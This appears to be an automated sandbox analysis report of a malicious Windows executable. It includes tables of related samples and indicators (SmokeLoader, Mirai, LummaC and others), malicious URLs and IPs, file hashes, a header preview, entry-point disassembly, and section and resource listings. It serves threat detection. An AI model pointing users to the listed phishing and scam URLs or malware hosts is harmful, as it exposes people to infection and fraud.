| veEGy9FijY.exe | malicious | SmokeLoader | 58.151.148.90
| v173TV3V11.exe | malicious | SmokeLoader | 190.219.117.240
| 0k3ibTiMjy.exe | malicious | SmokeLoader | 189.61.54.32
| qg5Ddf4an9.exe | malicious | SmokeLoader | 181.52.122.51

Match | Associated Sample Name / URL | Detection | Threat Name | Context
HETZNER-ASDE | https://cloud.list.lu/index.php/s/znw4dNSttiDzHTB | malicious | Unknown | 85.10.195.17
| UV2uLdRZix.exe | malicious | SmokeLoader | 188.40.141.211
| PURCHASE ORDER-6350.exe | malicious | FormBook | 148.251.114.233
| zncaKWwEdq.exe | malicious | Vidar | 116.203.9.188
| LKpIHL2abO.exe | malicious | SmokeLoader | 188.40.141.211
| na.elf | malicious | Unknown | 116.203.104.203
| na.elf | malicious | Unknown | 116.203.104.203
| http://suraj-tumuluri.github.io/UI-Clone-Netflix | malicious | HTMLPhisher | 78.46.22.25
| na.elf | malicious | Mirai | 91.107.182.122
| https://thiiirrrrddddddd-30x.pages.dev/ | malicious | TechSupportScam | 195.201.57.90
SURFAIRWIRELESS-IN-01US | UV2uLdRZix.exe | malicious | SmokeLoader | 23.145.40.164
| LKpIHL2abO.exe | malicious | SmokeLoader | 23.145.40.164
| wu5C20dPdy.exe | malicious | SmokeLoader | 23.145.40.164
| HaPJ2rPP6w.exe | malicious | SmokeLoader | 23.145.40.164
| c7v62g0YpB.exe | malicious | SmokeLoader | 23.145.40.162
| 9VgIkx4su0.exe | malicious | SmokeLoader | 23.145.40.162
| veEGy9FijY.exe | malicious | SmokeLoader | 23.145.40.162
| v173TV3V11.exe | malicious | SmokeLoader | 23.145.40.162
| 0k3ibTiMjy.exe | malicious | SmokeLoader | 23.145.40.162
| qg5Ddf4an9.exe | malicious | SmokeLoader | 23.145.40.162
MegaCableSAdeCVMX | xd.arm.elf | malicious | Mirai | 187.246.98.10
| na.elf | malicious | Mirai | 177.230.234.128
| yakov.arm7.elf | malicious | Mirai | 187.240.239.91
| SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elf | malicious | Mirai | 187.241.225.173
| mlnZfOifRX.elf | malicious | Okiru | 177.226.231.31
| SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elf | malicious | Mirai | 201.132.172.57
| m68k.elf | malicious | Unknown | 148.216.187.54
| 154.213.187.80-arm-2024-08-30T23_29_44.elf | malicious | Mirai | 189.194.242.57
| firmware.armv4l.elf | malicious | Unknown | 148.216.239.219
| sora.arm.elf | malicious | Mirai | 177.243.32.122
RAYA-ASEG | na.elf | malicious | Mirai, Okiru | 41.68.96.102
| na.elf | malicious | Mirai | 41.68.96.146
| na.elf | malicious | Mirai | 62.68.231.166
| na.elf | malicious | Mirai | 41.70.6.198
| na.elf | malicious | Mirai | 41.70.6.194
| na.elf | malicious | Gafgyt, Mirai | 41.68.48.233
| na.elf | malicious | Mirai | 197.132.199.54
| gmpsl.elf | malicious | Mirai | 197.132.31.215
| mips.elf | malicious | Mirai | 41.68.96.126
| mpsl.elf | malicious | Mirai | 197.132.199.57

Match | Associated Sample Name / URL | Detection | Threat Name | Context
72a589da586844d7f0818ce684948eea | UV2uLdRZix.exe | malicious | SmokeLoader | 23.145.40.164
| LKpIHL2abO.exe | malicious | SmokeLoader | 23.145.40.164
| wu5C20dPdy.exe | malicious | SmokeLoader | 23.145.40.164
| HaPJ2rPP6w.exe | malicious | SmokeLoader | 23.145.40.164
| c7v62g0YpB.exe | malicious | SmokeLoader | 23.145.40.164
| 9VgIkx4su0.exe | malicious | SmokeLoader | 23.145.40.164
| veEGy9FijY.exe | malicious | SmokeLoader | 23.145.40.164
| v173TV3V11.exe | malicious | SmokeLoader | 23.145.40.164
| 0k3ibTiMjy.exe | malicious | SmokeLoader | 23.145.40.164
| qg5Ddf4an9.exe | malicious | SmokeLoader | 23.145.40.164
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 188.40.141.211
| xwZfYpo16i.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc | 188.40.141.211
| c3KH2gLNrM.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 188.40.141.211
| file.exe | malicious | LummaC | 188.40.141.211
| file.exe | malicious | LummaC | 188.40.141.211
| file.exe | malicious | LummaC | 188.40.141.211
| file.exe | malicious | LummaC | 188.40.141.211
| file.exe | malicious | LummaC | 188.40.141.211
| file.exe | malicious | LummaC | 188.40.141.211
| KClGcCpDAP.exe | malicious | Unknown | 188.40.141.211
                                        No context
                                        Process:C:\Windows\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):445952
                                        Entropy (8bit):6.33809988244996
                                        Encrypted:false
                                        SSDEEP:6144:LwUZ9L7YogfjUt9cFAKm8shskq17c4IARUEe+8ULQTdVjzwa4opTT:LfZh7YokjUbc9m8shsXA0UP+gNLT
                                        MD5:0719C6940AABCC832DB40F7EE68A25DC
                                        SHA1:0D23A06DAA49E69D41ED406C32C6EE2C4F8445E1
                                        SHA-256:77931F6678ADECE99070E617DCC98A2E9BE636803BFE8DED58CF8A5362DD4430
                                        SHA-512:0264DE6170008268F46EC96CC2FF2EB34A1D71EA841BE909810A1A891339BADCB2E9E3020FDEE04288ED5070A19668ADDE2E6C153FBAA10D9F577D7C1B009EAE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..L_..._..y_..._..x_..._.A_..._..._S.._..}_..._..H_..._..O_..._Rich..._........................PE..L......e.............................9............@.........................................................................u..P....................................u..............................Xl..@............................................text............................... ..`.rdata..R...........................@..@.data............^...t..............@....fulocu.............................@..@.soro...............................@..@.kefef..............................@....rsrc...............................@..@........................................................................................................................................................................................................................................
                                        Process:C:\Windows\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:modified
                                        Size (bytes):445952
                                        Entropy (8bit):6.33809988244996
                                        Encrypted:false
                                        SSDEEP:6144:LwUZ9L7YogfjUt9cFAKm8shskq17c4IARUEe+8ULQTdVjzwa4opTT:LfZh7YokjUbc9m8shsXA0UP+gNLT
                                        MD5:0719C6940AABCC832DB40F7EE68A25DC
                                        SHA1:0D23A06DAA49E69D41ED406C32C6EE2C4F8445E1
                                        SHA-256:77931F6678ADECE99070E617DCC98A2E9BE636803BFE8DED58CF8A5362DD4430
                                        SHA-512:0264DE6170008268F46EC96CC2FF2EB34A1D71EA841BE909810A1A891339BADCB2E9E3020FDEE04288ED5070A19668ADDE2E6C153FBAA10D9F577D7C1B009EAE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..L_..._..y_..._..x_..._.A_..._..._S.._..}_..._..H_..._..O_..._Rich..._........................PE..L......e.............................9............@.........................................................................u..P....................................u..............................Xl..@............................................text............................... ..`.rdata..R...........................@..@.data............^...t..............@....fulocu.............................@..@.soro...............................@..@.kefef..............................@....rsrc...............................@..@........................................................................................................................................................................................................................................
                                        Process:C:\Windows\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):447488
                                        Entropy (8bit):6.349979284586235
                                        Encrypted:false
                                        SSDEEP:6144:zwtN955b+GARrBUNLMmAjgRkRXsmZabQTdVjtga4opTT:zuNL5aGyUBMmAjnFZpptLT
                                        MD5:D0D4805488E7E745515FFF2165D3CC05
                                        SHA1:0CEBEC529DE0430C9E897F740700B27C043A8552
                                        SHA-256:E684BED5B84F09DD85A88A7847FB4AAED9845F9B8098F0DDA486A095A3115D4C
                                        SHA-512:5A7DEBE1760FBEF5FCA9D0A1326F4BCF4336540FFA7956232F0AD380605CD99637AF769BCA7D0F91BB1C26FFC094968D6471A4427412041ECBA7F9FB5B93719C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..L_..._..y_..._..x_..._.A_..._..._S.._..}_..._..H_..._..O_..._Rich..._........................PE..L....V.f.............................9............@..........................................................................|..P...................................X|...............................r..@............................................text............................... ..`.rdata..............................@..@.data............^...z..............@....gol................................@..@.xowujad............................@..@.xonag..............................@....rsrc...............................@..@........................................................................................................................................................................................................................................
                                        Process:C:\Windows\explorer.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.349979284586235
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:BzLGqYKy7o.exe
                                        File size:447'488 bytes
                                        MD5:d0d4805488e7e745515fff2165d3cc05
                                        SHA1:0cebec529de0430c9e897f740700b27c043a8552
                                        SHA256:e684bed5b84f09dd85a88a7847fb4aaed9845f9b8098f0dda486a095a3115d4c
                                        SHA512:5a7debe1760fbef5fca9d0a1326f4bcf4336540ffa7956232f0ad380605cd99637af769bca7d0f91bb1c26ffc094968d6471a4427412041ecba7f9fb5b93719c
                                        SSDEEP:6144:zwtN955b+GARrBUNLMmAjgRkRXsmZabQTdVjtga4opTT:zuNL5aGyUBMmAjnFZpptLT
                                        TLSH:8294BF02A6F1BC60F52266B18E2AD7EC355EFC419E18675F23197F1F18722E1D6327A0
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..L_..._..y_..._..x_..._..A_..._..._S.._..}_..._..H_..._..O_..._Rich..._........................PE..L....V.f...
                                        Icon Hash:49294955554d610d
                                        Entrypoint:0x4039a0
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6616568B [Wed Apr 10 09:06:19 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:6e15f2578101cc821c000ba42c1b85a8
                                        Instruction
                                        call 00007F470C6DAF1Ah
                                        jmp 00007F470C6D81BEh
                                        push dword ptr [0044EFB8h]
                                        call dword ptr [0040D110h]
                                        test eax, eax
                                        je 00007F470C6D8334h
                                        call eax
                                        push 00000019h
                                        call 00007F470C6DA5B7h
                                        push 00000001h
                                        push 00000000h
                                        call 00007F470C6D7CE9h
                                        add esp, 0Ch
                                        jmp 00007F470C6D7CAEh
                                        mov edi, edi
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 20h
                                        mov eax, dword ptr [ebp+08h]
                                        push esi
                                        push edi
                                        push 00000008h
                                        pop ecx
                                        mov esi, 0040D390h
                                        lea edi, dword ptr [ebp-20h]
                                        rep movsd
                                        mov dword ptr [ebp-08h], eax
                                        mov eax, dword ptr [ebp+0Ch]
                                        pop edi
                                        mov dword ptr [ebp-04h], eax
                                        pop esi
                                        test eax, eax
                                        je 00007F470C6D833Eh
                                        test byte ptr [eax], 00000008h
                                        je 00007F470C6D8339h
                                        mov dword ptr [ebp-0Ch], 01994000h
                                        lea eax, dword ptr [ebp-0Ch]
                                        push eax
                                        push dword ptr [ebp-10h]
                                        push dword ptr [ebp-1Ch]
                                        push dword ptr [ebp-20h]
                                        call dword ptr [0040D144h]
                                        leave
                                        retn 0008h
                                        mov edi, edi
                                        push ebp
                                        mov ebp, esp
                                        push ecx
                                        push ebx
                                        mov eax, dword ptr [ebp+0Ch]
                                        add eax, 0Ch
                                        mov dword ptr [ebp-04h], eax
                                        mov ebx, dword ptr fs:[00000000h]
                                        mov eax, dword ptr [ebx]
                                        mov dword ptr fs:[00000000h], eax
                                        mov eax, dword ptr [ebp+08h]
                                        mov ebx, dword ptr [ebp+0Ch]
                                        mov ebp, dword ptr [ebp-04h]
                                        mov esp, dword ptr [ebx-04h]
                                        jmp eax
                                        pop ebx
                                        leave
                                        retn 0008h
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax
                                        Programming Language:
                                        • [ASM] VS2010 build 30319
                                        • [C++] VS2010 build 30319
                                        • [ C ] VS2010 build 30319
                                        • [IMP] VS2008 SP1 build 30729
                                        • [RES] VS2010 build 30319
                                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47c08 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0x1f1a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x47c58 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x472b0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x1d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xbdad | 0xbe00 | 5e2dcfacb98721a0c8099d8c142d6e52 | False | 0.6075863486842106 | data | 6.709568594890225 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x3b6b2 | 0x3b800 | 8c683d4899b1eea99d0c0c894d3ae42f | False | 0.7530938156512605 | data | 6.875369810081216 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x49000 | 0x10a00 | 0x5e00 | dd6946c771454473442f5f63e7083b90 | False | 0.08431682180851063 | data | 1.099697366277395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gol | 0x5a000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xowujad | 0x5b000 | 0xd6 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xonag | 0x5c000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5d000 | 0x1f1a8 | 0x1f200 | 210ea3fb05c74ca583491c35953e8b69 | False | 0.42537336847389556 | data | 5.043242607048044 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0x76b38 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | | | 0.1948529411764706 |
| RT_CURSOR | 0x76e68 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.33223684210526316 |
| RT_CURSOR | 0x76fc0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968 |
| RT_CURSOR | 0x77e68 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196 |
| RT_CURSOR | 0x78710 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579 |
| RT_CURSOR | 0x78ca8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755 |
| RT_CURSOR | 0x79b50 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018 |
| RT_CURSOR | 0x7a3f8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751 |
| RT_ICON | 0x5da80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.3718017057569296 |
| RT_ICON | 0x5da80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.3718017057569296 |
| RT_ICON | 0x5e928 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.45893501805054154 |
| RT_ICON | 0x5e928 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.45893501805054154 |
| RT_ICON | 0x5f1d0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.45794930875576034 |
| RT_ICON | 0x5f1d0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.45794930875576034 |
| RT_ICON | 0x5f898 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.45809248554913296 |
| RT_ICON | 0x5f898 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.45809248554913296 |
| RT_ICON | 0x5fe00 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.2704356846473029 |
| RT_ICON | 0x5fe00 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.2704356846473029 |
| RT_ICON | 0x623a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.30558161350844276 |
| RT_ICON | 0x623a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.30558161350844276 |
| RT_ICON | 0x63450 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3608156028368794 |
| RT_ICON | 0x63450 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3608156028368794 |
| RT_ICON | 0x63920 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.5621002132196162 |
| RT_ICON | 0x63920 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.5621002132196162 |
| RT_ICON | 0x647c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.5464801444043321 |
| RT_ICON | 0x647c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.5464801444043321 |
| RT_ICON | 0x65070 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.6221098265895953 |
| RT_ICON | 0x65070 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.6221098265895953 |
| RT_ICON | 0x655d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.46255186721991703 |
| RT_ICON | 0x655d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.46255186721991703 |
| RT_ICON | 0x67b80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.4901500938086304 |
| RT_ICON | 0x67b80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.4901500938086304 |
| RT_ICON | 0x68c28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.494672131147541 |
| RT_ICON | 0x68c28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.494672131147541 |
| RT_ICON | 0x695b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.449468085106383 |
| RT_ICON | 0x695b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.449468085106383 |
| RT_ICON | 0x69a80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.376865671641791 |
| RT_ICON | 0x69a80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.376865671641791 |
| RT_ICON | 0x6a928 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.506768953068592 |
| RT_ICON | 0x6a928 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.506768953068592 |
| RT_ICON | 0x6b1d0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.5702764976958525 |
| RT_ICON | 0x6b1d0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.5702764976958525 |
| RT_ICON | 0x6b898 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.5816473988439307 |
| RT_ICON | 0x6b898 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.5816473988439307 |
| RT_ICON | 0x6be00 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.37053941908713695 |
| RT_ICON | 0x6be00 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.37053941908713695 |
| RT_ICON | 0x6e3a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.4129924953095685 |
| RT_ICON | 0x6e3a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.4129924953095685 |
| RT_ICON | 0x6f450 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.4012295081967213 |
| RT_ICON | 0x6f450 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.4012295081967213 |
| RT_ICON | 0x6fdd8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.4716312056737589 |
| RT_ICON | 0x6fdd8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.4716312056737589 |
| RT_ICON | 0x702b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.3773987206823028 |
| RT_ICON | 0x702b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.3773987206823028 |
| RT_ICON | 0x71160 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.5248194945848376 |
| RT_ICON | 0x71160 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.5248194945848376 |
| RT_ICON | 0x71a08 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.6042626728110599 |
| RT_ICON | 0x71a08 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.6042626728110599 |
| RT_ICON | 0x720d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.6596820809248555 |
| RT_ICON | 0x720d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.6596820809248555 |
| RT_ICON | 0x72638 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.4900414937759336 |
| RT_ICON | 0x72638 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.4900414937759336 |
| RT_ICON | 0x74be0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.5082082551594747 |
| RT_ICON | 0x74be0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.5082082551594747 |
| RT_ICON | 0x75c88 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.48811475409836064 |
| RT_ICON | 0x75c88 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.48811475409836064 |
| RT_ICON | 0x76610 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.5407801418439716 |
| RT_ICON | 0x76610 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.5407801418439716 |
| RT_STRING | 0x7abe8 | 0x370 | data | Tamil | India | 0.4681818181818182 |
| RT_STRING | 0x7abe8 | 0x370 | data | Tamil | Sri Lanka | 0.4681818181818182 |
| RT_STRING | 0x7af58 | 0x6c0 | data | Tamil | India | 0.43344907407407407 |
| RT_STRING | 0x7af58 | 0x6c0 | data | Tamil | Sri Lanka | 0.43344907407407407 |
| RT_STRING | 0x7b618 | 0x37c | data | Tamil | India | 0.45067264573991034 |
| RT_STRING | 0x7b618 | 0x37c | data | Tamil | Sri Lanka | 0.45067264573991034 |
| RT_STRING | 0x7b998 | 0x590 | data | Tamil | India | 0.43820224719101125 |
| RT_STRING | 0x7b998 | 0x590 | data | Tamil | Sri Lanka | 0.43820224719101125 |
| RT_STRING | 0x7bf28 | 0x27e | data | Tamil | India | 0.49059561128526646 |
| RT_STRING | 0x7bf28 | 0x27e | data | Tamil | Sri Lanka | 0.49059561128526646 |
| RT_ACCELERATOR | 0x76af0 | 0x48 | data | Tamil | India | 0.8472222222222222 |
| RT_ACCELERATOR | 0x76af0 | 0x48 | data | Tamil | Sri Lanka | 0.8472222222222222 |
| RT_GROUP_CURSOR | 0x76f98 | 0x22 | data | | | 1.0294117647058822 |
| RT_GROUP_CURSOR | 0x78c78 | 0x30 | data | | | 0.9375 |
| RT_GROUP_CURSOR | 0x7a960 | 0x30 | data | | | 0.9375 |
| RT_GROUP_ICON | 0x69a18 | 0x68 | data | Tamil | India | 0.7019230769230769 |
| RT_GROUP_ICON | 0x69a18 | 0x68 | data | Tamil | Sri Lanka | 0.7019230769230769 |
| RT_GROUP_ICON | 0x638b8 | 0x68 | data | Tamil | India | 0.6826923076923077 |
| RT_GROUP_ICON | 0x638b8 | 0x68 | data | Tamil | Sri Lanka | 0.6826923076923077 |
| RT_GROUP_ICON | 0x70240 | 0x76 | data | Tamil | India | 0.6779661016949152 |
| RT_GROUP_ICON | 0x70240 | 0x76 | data | Tamil | Sri Lanka | 0.6779661016949152 |
| RT_GROUP_ICON | 0x76a78 | 0x76 | data | Tamil | India | 0.6779661016949152 |
| RT_GROUP_ICON | 0x76a78 | 0x76 | data | Tamil | Sri Lanka | 0.6779661016949152 |
| RT_VERSION | 0x7a990 | 0x258 | data | | | 0.5416666666666666 |
| DLL | Import |
|---|---|
